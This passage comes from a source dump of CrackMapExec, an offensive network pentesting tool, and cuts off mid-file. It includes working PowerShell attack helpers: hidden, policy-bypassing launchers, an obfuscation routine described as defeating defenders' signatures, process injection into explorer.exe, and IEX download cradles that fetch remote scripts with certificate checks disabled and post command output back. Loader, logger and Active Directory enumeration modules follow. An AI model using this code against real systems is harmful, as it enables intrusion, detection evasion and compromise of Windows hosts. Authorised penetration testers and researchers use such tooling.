else:\n \"\"\"\n if not dont_obfs:\n obfs_attempts = 0\n while True:\n command = f'powershell.exe -exec bypass -noni -nop -w 1 -C \"{invoke_obfuscation(command)}\"'\n if len(command) <= 8191:\n break\n\n if obfs_attempts == 4:\n cme_logger.error(f\"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.\")\n exit(1)\n\n obfs_attempts += 1\n else:\n command = f\"powershell.exe -noni -nop -w 1 -enc {encode_ps_command(command)}\"\n if len(command) > 8191:\n cme_logger.error(f\"Command exceeds maximum length of 8191 chars (was {len(command)}). exiting.\")\n exit(1)\n\n return command\n\n\ndef gen_ps_inject(command, context=None, procname=\"explorer.exe\", inject_once=False):\n # The following code gives us some control over where and how Invoke-PSInject does its thang\n # It prioritizes injecting into a process of the active console session\n ps_code = \"\"\"\n$injected = $False\n$inject_once = {inject_once}\n$command = \"{command}\"\n$owners = @{{}}\n$console_login = gwmi win32_computersystem | select -exp Username\ngwmi win32_process | where {{$_.Name.ToLower() -eq '{procname}'.ToLower()}} | % {{\n if ($_.getowner().domain -and $_.getowner().user){{\n $owners[$_.getowner().domain + \"\\\\\" + $_.getowner().user] = $_.handle\n }}\n}}\ntry {{\n if ($owners.ContainsKey($console_login)){{\n Invoke-PSInject -ProcId $owners.Get_Item($console_login) -PoshCode $command\n $injected = $True\n $owners.Remove($console_login)\n }}\n}}\ncatch {{}}\nif (($injected -eq $False) -or ($inject_once -eq $False)){{\n foreach ($owner in $owners.Values) {{\n try {{\n Invoke-PSInject -ProcId $owner -PoshCode $command\n }}\n catch {{}}\n }}\n}}\n\"\"\".format(\n inject_once=\"$True\" if inject_once else \"$False\",\n command=encode_ps_command(command),\n procname=procname,\n )\n\n if context:\n return gen_ps_iex_cradle(context, \"Invoke-PSInject.ps1\", ps_code, post_back=False)\n\n return ps_code\n\n\ndef gen_ps_iex_cradle(context, scripts, command=str(), post_back=True):\n if type(scripts) is str:\n launcher = \"\"\"\n[Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}}\n[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'\nIEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{ps_script_name}')\n{command}\n\"\"\".format(\n server=context.server,\n port=context.server_port,\n addr=context.localip,\n ps_script_name=scripts,\n command=command if post_back is False else \"\",\n ).strip()\n\n elif type(scripts) is list:\n launcher = \"[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}\\n\"\n launcher += \"[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]'Ssl3,Tls,Tls11,Tls12'\"\n for script in scripts:\n launcher += \"IEX (New-Object Net.WebClient).DownloadString('{server}://{addr}:{port}/{script}')\\n\".format(\n server=context.server,\n port=context.server_port,\n addr=context.localip,\n script=script,\n )\n launcher.strip()\n launcher += command if post_back is False else \"\"\n\n if post_back is True:\n launcher += \"\"\"\n$cmd = {command}\n$request = [System.Net.WebRequest]::Create('{server}://{addr}:{port}/')\n$request.Method = 'POST'\n$request.ContentType = 'application/x-www-form-urlencoded'\n$bytes = [System.Text.Encoding]::ASCII.GetBytes($cmd)\n$request.ContentLength = $bytes.Length\n$requestStream = $request.GetRequestStream()\n$requestStream.Write($bytes, 0, $bytes.Length)\n$requestStream.Close()\n$request.GetResponse()\"\"\".format(\n server=context.server,\n port=context.server_port,\n addr=context.localip,\n command=command,\n )\n\n cme_logger.debug(f\"Generated PS IEX Launcher:\\n {launcher}\\n\")\n\n return launcher.strip()\n\n\n# Following was stolen from https://raw.githubusercontent.com/GreatSCT/GreatSCT/templates/invokeObfuscation.py\ndef invoke_obfuscation(script_string):\n # Add letters a-z with random case to $RandomDelimiters.\n alphabet = \"\".join(choice([i.upper(), i]) for i in ascii_lowercase)\n\n # Create list of random delimiters called random_delimiters.\n # Avoid using . * ' \" [ ] ( ) etc. as delimiters as these will cause problems in the -Split command syntax.\n random_delimiters = [\n \"_\",\n \"-\",\n \",\",\n \"{\",\n \"}\",\n \"~\",\n \"!\",\n \"@\",\n \"%\",\n \"&\",\n \"<\",\n \">\",\n \";\",\n \":\",\n ]\n\n for i in alphabet:\n random_delimiters.append(i)\n\n # Only use a subset of current delimiters to randomize what you see in every iteration of this script's output.\n random_delimiters = [choice(random_delimiters) for _ in range(int(len(random_delimiters) / 4))]\n\n # Convert $ScriptString to delimited ASCII values in [Char] array separated by random delimiter from defined list $RandomDelimiters.\n delimited_encoded_array = \"\"\n for char in script_string:\n delimited_encoded_array += str(ord(char)) + choice(random_delimiters)\n\n # Remove trailing delimiter from $DelimitedEncodedArray.\n delimited_encoded_array = delimited_encoded_array[:-1]\n # Create printable version of $RandomDelimiters in random order to be used by final command.\n test = sample(random_delimiters, len(random_delimiters))\n random_delimiters_to_print = \"\".join(i for i in test)\n\n # Generate random case versions for necessary operations.\n for_each_object = choice([\"ForEach\", \"ForEach-Object\", \"%\"])\n str_join = \"\".join(choice([i.upper(), i.lower()]) for i in \"[String]::Join\")\n str_str = \"\".join(choice([i.upper(), i.lower()]) for i in \"[String]\")\n join = \"\".join(choice([i.upper(), i.lower()]) for i in \"-Join\")\n char_str = \"\".join(choice([i.upper(), i.lower()]) for i in \"Char\")\n integer = \"\".join(choice([i.upper(), i.lower()]) for i in \"Int\")\n for_each_object = \"\".join(choice([i.upper(), i.lower()]) for i in for_each_object)\n\n # Create printable version of $RandomDelimiters in random order to be used by final command specifically for -Split syntax\n random_delimiters_to_print_for_dash_split = \"\"\n\n for delim in random_delimiters:\n # Random case 'split' string.\n split = \"\".join(choice([i.upper(), i.lower()]) for i in \"Split\")\n random_delimiters_to_print_for_dash_split += \"-\" + split + choice([\"\", \" \"]) + \"'\" + delim + \"'\" + choice([\"\", \" \"])\n\n random_delimiters_to_print_for_dash_split = random_delimiters_to_print_for_dash_split.strip(\"\\t\\n\\r\")\n # Randomly select between various conversion syntax options.\n random_conversion_syntax = [\n \"[\" + char_str + \"]\" + choice([\"\", \" \"]) + \"[\" + integer + \"]\" + choice([\"\", \" \"]) + \"$_\",\n \"[\" + integer + \"]\" + choice([\"\", \" \"]) + \"$_\" + choice([\"\", \" \"]) + choice([\"-as\", \"-As\", \"-aS\", \"-AS\"]) + choice([\"\", \" \"]) + \"[\" + char_str + \"]\",\n ]\n random_conversion_syntax = choice(random_conversion_syntax)\n\n # Create array syntax for encoded scriptString as alternative to .Split/-Split syntax.\n encoded_array = \"\"\n for char in script_string:\n encoded_array += str(ord(char)) + choice([\"\", \" \"]) + \",\" + choice([\"\", \" \"])\n\n # Remove trailing comma from encoded_array\n encoded_array = \"(\" + choice([\"\", \" \"]) + encoded_array.rstrip().rstrip(\",\") + \")\"\n\n # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable).\n # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists.\n # If the OFS variable did exist then we could use even more syntax:\n # $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls\n # For more info:\n # https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables\n\n set_ofs_var_syntax = [\n \"Set-Item\" + choice([\" \" * 1, \" \" * 2]) + \"'Variable:OFS'\" + choice([\" \" * 1, \" \" * 2]) + \"''\",\n choice([\"Set-Variable\", \"SV\", \"SET\"]) + choice([\" \" * 1, \" \" * 2]) + \"'OFS'\" + choice([\" \" * 1, \" \" * 2]) + \"''\",\n ]\n set_ofs_var = choice(set_ofs_var_syntax)\n\n set_ofs_var_back_syntax = [\n \"Set-Item\" + choice([\" \" * 1, \" \" * 2]) + \"'Variable:OFS'\" + choice([\" \" * 1, \" \" * 2]) + \"' '\",\n \"Set-Item\" + choice([\" \" * 1, \" \" * 2]) + \"'Variable:OFS'\" + choice([\" \" * 1, \" \" * 2]) + \"' '\",\n ]\n set_ofs_var_back = choice(set_ofs_var_back_syntax)\n\n # Randomize case of $SetOfsVar and $SetOfsVarBack.\n set_ofs_var = \"\".join(choice([i.upper(), i.lower()]) for i in set_ofs_var)\n set_ofs_var_back = \"\".join(choice([i.upper(), i.lower()]) for i in set_ofs_var_back)\n\n # Generate the code that will decrypt and execute the payload and randomly select one.\n baseScriptArray = [\n \"[\" + char_str + \"[]\" + \"]\" + choice([\"\", \" \"]) + encoded_array,\n \"(\" + choice([\"\", \" \"]) + \"'\" + delimited_encoded_array + \"'.\" + split + \"(\" + choice([\"\", \" \"]) + \"'\" + random_delimiters_to_print + \"'\" + choice([\"\", \" \"]) + \")\" + choice([\"\", \" \"]) + \"|\" + choice([\"\", \" \"]) + for_each_object + choice([\"\", \" \"]) + \"{\" + choice([\"\", \" \"]) + \"(\" + choice([\"\", \" \"]) + random_conversion_syntax + \")\" + choice([\"\", \" \"]) + \"}\" + choice([\"\", \" \"]) + \")\",\n \"(\" + choice([\"\", \" \"]) + \"'\" + delimited_encoded_array + \"'\" + choice([\"\", \" \"]) + random_delimiters_to_print_for_dash_split + choice([\"\", \" \"]) + \"|\" + choice([\"\", \" \"]) + for_each_object + choice([\"\", \" \"]) + \"{\" + choice([\"\", \" \"]) + \"(\" + choice([\"\", \" \"]) + random_conversion_syntax + \")\" + choice([\"\", \" \"]) + \"}\" + choice([\"\", \" \"]) + \")\",\n \"(\" + choice([\"\", \" \"]) + encoded_array + choice([\"\", \" \"]) + \"|\" + choice([\"\", \" \"]) + for_each_object + choice([\"\", \" \"]) + \"{\" + choice([\"\", \" \"]) + \"(\" + choice([\"\", \" \"]) + random_conversion_syntax + \")\" + choice([\"\", \" \"]) + \"}\" + choice([\"\", \" \"]) + \")\",\n ]\n # Generate random JOIN syntax for all above options\n new_script_array = [\n choice(baseScriptArray) + choice([\"\", \" \"]) + join + choice([\"\", \" \"]) + \"''\",\n join + choice([\"\", \" \"]) + choice(baseScriptArray),\n str_join + \"(\" + choice([\"\", \" \"]) + \"''\" + choice([\"\", \" \"]) + \",\" + choice([\"\", \" \"]) + choice(baseScriptArray) + choice([\"\", \" \"]) + \")\",\n '\"' + choice([\"\", \" \"]) + \"$(\" + choice([\"\", \" \"]) + set_ofs_var + choice([\"\", \" \"]) + \")\" + choice([\"\", \" \"]) + '\"' + choice([\"\", \" \"]) + \"+\" + choice([\"\", \" \"]) + str_str + choice(baseScriptArray) + choice([\"\", \" \"]) + \"+\" + '\"' + choice([\"\", \" \"]) + \"$(\" + choice([\"\", \" \"]) + set_ofs_var_back + choice([\"\", \" \"]) + \")\" + choice([\"\", \" \"]) + '\"',\n ]\n\n # Randomly select one of the above commands.\n newScript = choice(new_script_array)\n\n # Generate random invoke operation syntax\n # Below code block is a copy from Out-ObfuscatedStringCommand.ps1\n # It is copied into this encoding function so that this will remain a standalone script without dependencies\n invoke_expression_syntax = [choice([\"IEX\", \"Invoke-Expression\"])]\n\n # Added below slightly-randomized obfuscated ways to form the string 'iex' and then invoke it with . or &.\n # Though far from fully built out, these are included to highlight how IEX/Invoke-Expression is a great indicator,\n # but not a silver bullet\n # These methods draw on common environment variable values and PowerShell Automatic Variable\n # values/methods/members/properties/etc.\n invocationOperator = choice([\".\", \"&\"]) + choice([\"\", \" \"])\n invoke_expression_syntax.append(invocationOperator + \"( $ShellId[1]+$ShellId[13]+'x')\")\n invoke_expression_syntax.append(invocationOperator + \"( $PSHome[\" + choice([\"4\", \"21\"]) + \"]+$PSHOME[\" + choice([\"30\", \"34\"]) + \"]+'x')\")\n invoke_expression_syntax.append(invocationOperator + \"( $env:Public[13]+$env:Public[5]+'x')\")\n invoke_expression_syntax.append(invocationOperator + \"( $env:ComSpec[4,\" + choice([\"15\", \"24\", \"26\"]) + \",25]-Join'')\")\n invoke_expression_syntax.append(invocationOperator + \"((\" + choice([\"Get-Variable\", \"GV\", \"Variable\"]) + \" '*mdr*').Name[3,11,2]-Join'')\")\n invoke_expression_syntax.append(invocationOperator + \"( \" + choice([\"$VerbosePreference.ToString()\", \"([String]$VerbosePreference)\"]) + \"[1,3]+'x'-Join'')\")\n\n # Randomly choose from above invoke operation syntaxes.\n invokeExpression = choice(invoke_expression_syntax)\n\n # Randomize the case of selected invoke operation.\n invokeExpression = \"\".join(choice([i.upper(), i.lower()]) for i in invokeExpression)\n\n # Choose random Invoke-Expression/IEX syntax and ordering: IEX ($ScriptString) or ($ScriptString | IEX)\n invokeOptions = [\n choice([\"\", \" \"]) + invokeExpression + choice([\"\", \" \"]) + \"(\" + choice([\"\", \" \"]) + newScript + choice([\"\", \" \"]) + \")\" + choice([\"\", \" \"]),\n choice([\"\", \" \"]) + newScript + choice([\"\", \" \"]) + \"|\" + choice([\"\", \" \"]) + invokeExpression,\n ]\n\n obfuscated_payload = choice(invokeOptions)\n\n \"\"\"\n # Array to store all selected PowerShell execution flags.\n powerShellFlags = []\n\n noProfile = '-nop'\n nonInteractive = '-noni'\n windowStyle = '-w'\n\n # Build the PowerShell execution flags by randomly selecting execution flags substrings and randomizing the order.\n # This is to prevent Blue Team from placing false hope in simple signatures for common substrings of these execution flags.\n commandlineOptions = []\n commandlineOptions.append(noProfile[0:randrange(4, len(noProfile) + 1, 1)])\n commandlineOptions.append(nonInteractive[0:randrange(5, len(nonInteractive) + 1, 1)])\n # Randomly decide to write WindowStyle value with flag substring or integer value.\n commandlineOptions.append(''.join(windowStyle[0:randrange(2, len(windowStyle) + 1, 1)] + choice([' '*1, ' '*2, ' '*3]) + choice(['1','h','hi','hid','hidd','hidde'])))\n\n # Randomize the case of all command-line arguments.\n for count, option in enumerate(commandlineOptions):\n commandlineOptions[count] = ''.join(choice([i.upper(), i.lower()]) for i in option)\n\n for count, option in enumerate(commandlineOptions):\n commandlineOptions[count] = ''.join(option)\n\n commandlineOptions = sample(commandlineOptions, len(commandlineOptions)) \n commandlineOptions = ''.join(i + choice([' '*1, ' '*2, ' '*3]) for i in commandlineOptions)\n\n obfuscatedPayload = 'powershell.exe ' + commandlineOptions + newScript\n \"\"\"\n return obfuscated_payload\n" }, { "path": "cme/loaders/__init__.py", "content": "" }, { "path": "cme/loaders/moduleloader.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cme\nimport importlib\nimport traceback\nimport sys\n\nfrom os import listdir\nfrom os.path import dirname\nfrom os.path import join as path_join\n\nfrom cme.context import Context\nfrom cme.logger import CMEAdapter\nfrom cme.paths import CME_PATH\n\n\nclass ModuleLoader:\n def __init__(self, args, db, logger):\n self.args = args\n self.db = db\n self.logger = logger\n\n def module_is_sane(self, module, module_path):\n \"\"\"\n Check if a module has the proper attributes\n \"\"\"\n module_error = False\n if not hasattr(module, \"name\"):\n self.logger.fail(f\"{module_path} missing the name variable\")\n module_error = True\n elif not hasattr(module, \"description\"):\n self.logger.fail(f\"{module_path} missing the description variable\")\n module_error = True\n elif not hasattr(module, \"supported_protocols\"):\n self.logger.fail(f\"{module_path} missing the supported_protocols variable\")\n module_error = True\n elif not hasattr(module, \"opsec_safe\"):\n self.logger.fail(f\"{module_path} missing the opsec_safe variable\")\n module_error = True\n elif not hasattr(module, \"multiple_hosts\"):\n self.logger.fail(f\"{module_path} missing the multiple_hosts variable\")\n module_error = True\n elif not hasattr(module, \"options\"):\n self.logger.fail(f\"{module_path} missing the options function\")\n module_error = True\n elif not hasattr(module, \"on_login\") and not (module, \"on_admin_login\"):\n self.logger.fail(f\"{module_path} missing the on_login/on_admin_login function(s)\")\n module_error = True\n # elif not hasattr(module, 'chain_support'):\n # self.logger.fail('{} missing the chain_support variable'.format(module_path))\n # module_error = True\n\n if module_error:\n return False\n return True\n\n def load_module(self, module_path):\n \"\"\"\n Load a module, initializing it and checking that it has the proper attributes\n \"\"\"\n try:\n spec = importlib.util.spec_from_file_location(\"CMEModule\", module_path)\n module = spec.loader.load_module().CMEModule()\n\n if self.module_is_sane(module, module_path):\n return module\n except Exception as e:\n self.logger.fail(f\"Failed loading module at {module_path}: {e}\")\n self.logger.debug(traceback.format_exc())\n return None\n\n def init_module(self, module_path):\n \"\"\"\n Initialize a module for execution\n \"\"\"\n module = None\n module = self.load_module(module_path)\n\n if module:\n self.logger.debug(f\"Supported protocols: {module.supported_protocols}\")\n self.logger.debug(f\"Protocol: {self.args.protocol}\")\n if self.args.protocol in module.supported_protocols:\n try:\n module_logger = CMEAdapter(extra={\"module_name\": module.name.upper()})\n except Exception as e:\n self.logger.fail(f\"Error loading CMEAdaptor for module {module.name.upper()}: {e}\")\n context = Context(self.db, module_logger, self.args)\n module_options = {}\n\n for option in self.args.module_options:\n key, value = option.split(\"=\", 1)\n module_options[str(key).upper()] = value\n\n module.options(context, module_options)\n return module\n else:\n self.logger.fail(f\"Module {module.name.upper()} is not supported for protocol {self.args.protocol}\")\n sys.exit(1)\n\n def get_module_info(self, module_path):\n \"\"\"\n Get the path, description, and options from a module\n \"\"\"\n try:\n spec = importlib.util.spec_from_file_location(\"CMEModule\", module_path)\n module_spec = spec.loader.load_module().CMEModule\n\n module = {\n f\"{module_spec.name.lower()}\": {\n \"path\": module_path,\n \"description\": module_spec.description,\n \"options\": module_spec.options.__doc__,\n \"supported_protocols\": module_spec.supported_protocols,\n \"opsec_safe\": module_spec.opsec_safe,\n \"multiple_hosts\": module_spec.multiple_hosts,\n }\n }\n if self.module_is_sane(module_spec, module_path):\n return module\n except Exception as e:\n self.logger.fail(f\"Failed loading module at {module_path}: {e}\")\n self.logger.debug(traceback.format_exc())\n return None\n\n def list_modules(self):\n \"\"\"\n List modules without initializing them\n \"\"\"\n modules = {}\n modules_paths = [\n path_join(dirname(cme.__file__), \"modules\"),\n path_join(CME_PATH, \"modules\"),\n ]\n\n for path in modules_paths:\n for module in listdir(path):\n if module[-3:] == \".py\" and module != \"example_module.py\":\n try:\n module_path = path_join(path, module)\n module_data = self.get_module_info(module_path)\n modules.update(module_data)\n except:\n pass\n return modules\n" }, { "path": "cme/loaders/protocolloader.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nfrom types import ModuleType\nfrom importlib.machinery import SourceFileLoader\nfrom os import listdir\nfrom os.path import join as path_join\nfrom os.path import dirname, exists, expanduser\nimport cme\n\n\nclass ProtocolLoader:\n def __init__(self):\n self.cme_path = expanduser(\"~/.cme\")\n\n def load_protocol(self, protocol_path):\n loader = SourceFileLoader(\"protocol\", protocol_path)\n protocol = ModuleType(loader.name)\n loader.exec_module(protocol)\n return protocol\n\n def get_protocols(self):\n protocols = {}\n protocol_paths = [\n path_join(dirname(cme.__file__), \"protocols\"),\n path_join(self.cme_path, \"protocols\"),\n ]\n\n for path in protocol_paths:\n for protocol in listdir(path):\n if protocol[-3:] == \".py\" and protocol[:-3] != \"__init__\":\n protocol_path = path_join(path, protocol)\n protocol_name = protocol[:-3]\n\n protocols[protocol_name] = {\"path\": protocol_path}\n\n db_file_path = path_join(path, protocol_name, \"database.py\")\n db_nav_path = path_join(path, protocol_name, \"db_navigator.py\")\n protocol_args_path = path_join(path, protocol_name, \"proto_args.py\")\n if exists(db_file_path):\n protocols[protocol_name][\"dbpath\"] = db_file_path\n if exists(db_nav_path):\n protocols[protocol_name][\"nvpath\"] = db_nav_path\n if exists(protocol_args_path):\n protocols[protocol_name][\"argspath\"] = protocol_args_path\n\n return protocols\n" }, { "path": "cme/logger.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport logging\nfrom logging import LogRecord\nfrom logging.handlers import RotatingFileHandler\nimport os.path\nimport sys\nimport re\nfrom cme.helpers.misc import called_from_cmd_args\nfrom cme.console import cme_console\nfrom termcolor import colored\nfrom datetime import datetime\nfrom rich.text import Text\nfrom rich.logging import RichHandler\n\n\nclass CMEAdapter(logging.LoggerAdapter):\n def __init__(self, extra=None):\n logging.basicConfig(\n format=\"%(message)s\",\n datefmt=\"[%X]\",\n handlers=[\n RichHandler(\n console=cme_console,\n rich_tracebacks=True,\n tracebacks_show_locals=False,\n )\n ],\n )\n self.logger = logging.getLogger(\"cme\")\n self.extra = extra\n self.output_file = None\n\n logging.getLogger(\"pypykatz\").disabled = True\n logging.getLogger(\"minidump\").disabled = True\n logging.getLogger(\"lsassy\").disabled = True\n #logging.getLogger(\"impacket\").disabled = True\n\n def format(self, msg, *args, **kwargs):\n \"\"\"\n Format msg for output if needed\n This is used instead of process() since process() applies to _all_ messages, including debug calls\n \"\"\"\n if self.extra is None:\n return f\"{msg}\", kwargs\n\n if \"module_name\" in self.extra.keys():\n if len(self.extra[\"module_name\"]) > 8:\n self.extra[\"module_name\"] = self.extra[\"module_name\"][:8] + \"...\"\n\n # If the logger is being called when hooking the 'options' module function\n if len(self.extra) == 1 and (\"module_name\" in self.extra.keys()):\n return (\n f\"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<64} {msg}\",\n kwargs,\n )\n\n # If the logger is being called from CMEServer\n if len(self.extra) == 2 and (\"module_name\" in self.extra.keys()) and (\"host\" in self.extra.keys()):\n return (\n f\"{colored(self.extra['module_name'], 'cyan', attrs=['bold']):<24} {self.extra['host']:<39} {msg}\",\n kwargs,\n )\n\n # If the logger is being called from a protocol\n if \"module_name\" in self.extra.keys():\n module_name = colored(self.extra[\"module_name\"], \"cyan\", attrs=[\"bold\"])\n else:\n module_name = colored(self.extra[\"protocol\"], \"blue\", attrs=[\"bold\"])\n\n return (\n f\"{module_name:<24} {self.extra['host']:<15} {self.extra['port']:<6} {self.extra['hostname'] if self.extra['hostname'] else 'NONE':<16} {msg}\",\n kwargs,\n )\n\n def display(self, msg, *args, **kwargs):\n \"\"\"\n Display text to console, formatted for CME\n \"\"\"\n try:\n if \"protocol\" in self.extra.keys() and not called_from_cmd_args():\n return\n except AttributeError:\n pass\n\n msg, kwargs = self.format(f\"{colored('[*]', 'blue', attrs=['bold'])} {msg}\", kwargs)\n text = Text.from_ansi(msg)\n cme_console.print(text, *args, **kwargs)\n self.log_console_to_file(text, *args, **kwargs)\n\n def success(self, msg, color='green', *args, **kwargs):\n \"\"\"\n Print some sort of success to the user\n \"\"\"\n try:\n if \"protocol\" in self.extra.keys() and not called_from_cmd_args():\n return\n except AttributeError:\n pass\n\n msg, kwargs = self.format(f\"{colored('[+]', color, attrs=['bold'])} {msg}\", kwargs)\n text = Text.from_ansi(msg)\n cme_console.print(text, *args, **kwargs)\n self.log_console_to_file(text, *args, **kwargs)\n\n def highlight(self, msg, *args, **kwargs):\n \"\"\"\n Prints a completely yellow highlighted message to the user\n \"\"\"\n try:\n if \"protocol\" in self.extra.keys() and not called_from_cmd_args():\n return\n except AttributeError:\n pass\n\n msg, kwargs = self.format(f\"{colored(msg, 'yellow', attrs=['bold'])}\", kwargs)\n text = Text.from_ansi(msg)\n cme_console.print(text, *args, **kwargs)\n self.log_console_to_file(text, *args, **kwargs)\n\n def fail(self, msg, color='red', *args, **kwargs):\n \"\"\"\n Prints a failure (may or may not be an error) - e.g. login creds didn't work\n \"\"\"\n try:\n if \"protocol\" in self.extra.keys() and not called_from_cmd_args():\n return\n except AttributeError:\n pass\n msg, kwargs = self.format(f\"{colored('[-]', color, attrs=['bold'])} {msg}\", kwargs)\n text = Text.from_ansi(msg)\n cme_console.print(text, *args, **kwargs)\n self.log_console_to_file(text, *args, **kwargs)\n\n def log_console_to_file(self, text, *args, **kwargs):\n \"\"\"\n If debug or info logging is not enabled, we still want display/success/fail logged to the file specified,\n so we create a custom LogRecord and pass it to all the additional handlers (which will be all the file handlers\n \"\"\"\n if self.logger.getEffectiveLevel() >= logging.INFO:\n # will be 0 if it's just the console output, so only do this if we actually have file loggers\n if len(self.logger.handlers):\n try:\n for handler in self.logger.handlers:\n handler.handle(\n LogRecord(\n \"cme\",\n 20,\n \"\",\n kwargs,\n msg=text,\n args=args,\n exc_info=None,\n )\n )\n except Exception as e:\n self.logger.fail(f\"Issue while trying to custom print handler: {e}\")\n else:\n self.logger.info(text)\n\n def add_file_log(self, log_file=None):\n file_formatter = TermEscapeCodeFormatter(\"%(asctime)s - %(levelname)s - %(message)s\")\n output_file = self.init_log_file() if log_file is None else log_file\n file_creation = False\n\n if not os.path.isfile(output_file):\n open(output_file, \"x\")\n file_creation = True\n\n file_handler = RotatingFileHandler(output_file, maxBytes=100000)\n\n with file_handler._open() as f:\n if file_creation:\n f.write(\"[%s]> %s\\n\\n\" % (datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\"), \" \".join(sys.argv)))\n else:\n f.write(\"\\n[%s]> %s\\n\\n\" % (datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\"), \" \".join(sys.argv)))\n\n file_handler.setFormatter(file_formatter)\n self.logger.addHandler(file_handler)\n self.logger.debug(f\"Added file handler: {file_handler}\")\n\n @staticmethod\n def init_log_file():\n newpath = os.path.expanduser(\"~/.cme\") + \"/logs/\" + datetime.now().strftime('%Y-%m-%d')\n if not os.path.exists(newpath):\n os.makedirs(newpath)\n log_filename = os.path.join(\n os.path.expanduser(\"~/.cme\"),\n \"logs\",\n datetime.now().strftime('%Y-%m-%d'),\n f\"log_{datetime.now().strftime('%Y-%m-%d-%H-%M-%S')}.log\",\n )\n return log_filename\n\n\nclass TermEscapeCodeFormatter(logging.Formatter):\n \"\"\"A class to strip the escape codes for logging to files\"\"\"\n\n def __init__(self, fmt=None, datefmt=None, style=\"%\", validate=True):\n super().__init__(fmt, datefmt, style, validate)\n\n def format(self, record):\n escape_re = re.compile(r\"\\x1b\\[[0-9;]*m\")\n record.msg = re.sub(escape_re, \"\", str(record.msg))\n return super().format(record)\n\n\n# initialize the logger for all of CME - this is imported everywhere\ncme_logger = CMEAdapter()\n" }, { "path": "cme/modules/IOXIDResolver.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n# Credit to https://airbus-cyber-security.com/fr/the-oxid-resolver-part-1-remote-enumeration-of-network-interfaces-without-any-authentication/\n# Airbus CERT\n# module by @mpgn_x64\n\nfrom ipaddress import ip_address\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_LEVEL_NONE\nfrom impacket.dcerpc.v5.dcomrt import IObjectExporter\n\n\nclass CMEModule:\n name = \"ioxidresolver\"\n description = \"This module helps you to identify hosts that have additional active interfaces\"\n supported_protocols = [\"smb\", \"wmi\"]\n opsec_safe = True\n multiple_hosts = False\n\n def options(self, context, module_options):\n \"\"\" \"\"\"\n\n def on_login(self, context, connection):\n authLevel = RPC_C_AUTHN_LEVEL_NONE\n\n stringBinding = r\"ncacn_ip_tcp:%s\" % connection.host\n rpctransport = transport.DCERPCTransportFactory(stringBinding)\n\n portmap = rpctransport.get_dce_rpc()\n portmap.set_auth_level(authLevel)\n portmap.connect()\n\n objExporter = IObjectExporter(portmap)\n bindings = objExporter.ServerAlive2()\n\n context.log.debug(\"[*] Retrieving network interface of \" + connection.host)\n\n # NetworkAddr = bindings[0]['aNetworkAddr']\n for binding in bindings:\n NetworkAddr = binding[\"aNetworkAddr\"]\n try:\n ip_address(NetworkAddr[:-1])\n context.log.highlight(\"Address: \" + NetworkAddr)\n except Exception as e:\n context.log.debug(e)\n" }, { "path": "cme/modules/MachineAccountQuota.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nclass CMEModule:\n \"\"\"\n Module by Shutdown and Podalirius\n\n Initial module:\n https://github.com/ShutdownRepo/CrackMapExec-MachineAccountQuota\n\n Authors:\n Shutdown: @_nwodtuhs\n Podalirius: @podalirius_\n \"\"\"\n\n def options(self, context, module_options):\n pass\n\n name = \"MAQ\"\n description = \"Retrieves the MachineAccountQuota domain-level attribute\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True\n multiple_hosts = False\n\n def on_login(self, context, connection):\n result = []\n context.log.display(\"Getting the MachineAccountQuota\")\n searchFilter = \"(objectClass=*)\"\n attributes = [\"ms-DS-MachineAccountQuota\"]\n result = connection.search(searchFilter, attributes)\n context.log.highlight(\"MachineAccountQuota: %d\" % result[0][\"attributes\"][0][\"vals\"][0])\n" }, { "path": "cme/modules/adcs.py", "content": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\nimport re\nfrom impacket.ldap import ldap, ldapasn1\nfrom impacket.ldap.ldap import LDAPSearchError\n\n\nclass CMEModule:\n \"\"\"\n Find PKI Enrollment Services in Active Directory and Certificate Templates Names.\n\n Module by Tobias Neitzel (@qtc_de) and Sam Freeside (@snovvcrash)\n \"\"\"\n\n name = \"adcs\"\n description = \"Find PKI Enrollment Services in Active Directory and Certificate Templates Names\"\n supported_protocols = [\"ldap\"]\n opsec_safe = True\n multiple_hosts = True\n\n def __init__(self, context=None, module_options=None):\n self.context = context\n self.module_options = module_options\n self.server = None\n self.regex = None\n\n def options(self, context, module_options):\n \"\"\"\n SERVER PKI Enrollment Server to enumerate templates for. Default is None, use CN name\n BASE_DN The base domain name for the LDAP query\n \"\"\"\n self.context = context\n self.regex = re.compile(\"(https?://.+)\")\n\n self.server = None\n self.base_dn = None\n if module_options and \"SERVER\" in module_options:\n self.server = module_options[\"SERVER\"]\n if module_options and \"BASE_DN\" in module_options:\n self.base_dn = module_options[\"BASE_DN\"]\n\n def on_login(self, context, connection):\n \"\"\"\n On a successful LDAP login we perform a search for all PKI Enrollment Server or Certificate Templates Names.\n \"\"\"\n if self.server is None:\n search_filter = \"(objectClass=pKIEnrollmentService)\"\n else:\n search_filter = f\"(distinguishedName=CN={self.server},CN=Enrollment Services,CN=Public Key Services,CN=Services,CN=Configuration,\"\n self.context.log.highlight(\"Using PKI CN: {}\".format(self.server))\n\n context.log.display(\"Starting LDAP search with search filter '{}'\".format(search_filter))\n\n try:\n sc = ldap.SimplePagedResultsControl()\n base_dn_root = connection.ldapConnection._baseDN if self.base_dn is None else self.base_dn\n\n if self.server is None:\n resp = 